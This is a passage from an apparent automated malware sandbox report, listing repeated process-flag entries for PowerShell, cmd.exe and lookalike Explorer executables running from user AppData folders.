                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
